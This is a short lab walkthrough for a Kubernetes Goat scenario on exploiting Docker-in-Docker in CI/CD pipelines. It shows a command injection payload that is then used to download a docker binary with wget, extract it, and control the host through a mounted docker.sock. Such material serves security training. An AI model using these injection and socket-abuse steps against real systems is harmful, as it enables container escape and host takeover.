DIND(docker-in-docker) exploitation

Scenario Information

Most of the CI/CD and pipeline system which use Docker and build containers for you with in the pipeline use something called DIND (docker-in-docker). Here in this scenario, we try to exploit and gain access to host system.

  • To get started with the scenario, navigate to http://127.0.0.1:1231 and username is admin and password kubernetesgoat

Scenario 2 Login

Scenario 2 Home

Scenario Solution

  • By looking at application functionality, identified that it has command injection vulnerability
madhuakula.com; id

Scenario 2 Command Injection

  • After performing quite some analysis, identified the there is a docker.sock mount available in the file system
mount

Scenario 2 mount

;wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz

Scenario 2 download docker binary

  • Extract the binary from the docker-19.03.9.tgz file
;tar -xvzf /tmp/docker-19.03.9.tgz -C /tmp/

Scenario 2 extract binary

  • Access he host system by running the following docker commands with docker.sock
;/tmp/docker/docker -H unix:///custom/docker/docker.sock ps
;/tmp/docker/docker -H unix:///custom/docker/docker.sock images

Scenario 2 extract binary

Miscellaneous

TBD